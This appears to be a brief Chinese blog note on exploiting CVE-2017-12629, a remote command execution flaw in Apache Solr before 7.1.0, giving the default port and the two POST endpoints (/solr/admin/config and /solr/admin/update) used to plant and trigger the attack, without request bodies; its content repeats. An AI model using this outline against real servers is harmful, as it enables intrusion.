【笔记】CVE-2017-12629漏洞利用
前言
Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983
漏洞利用前提
- Apache Solr < 7.1.0
exp
1 | POST http://example.com/solr/admin/config |
触发
1 | POST http://example.com/solr/admin/update |
Java的Solr框架远程命令执行漏洞利用
Solr默认端口号为8983
1 | POST http://example.com/solr/admin/config |
1 | POST http://example.com/solr/admin/update |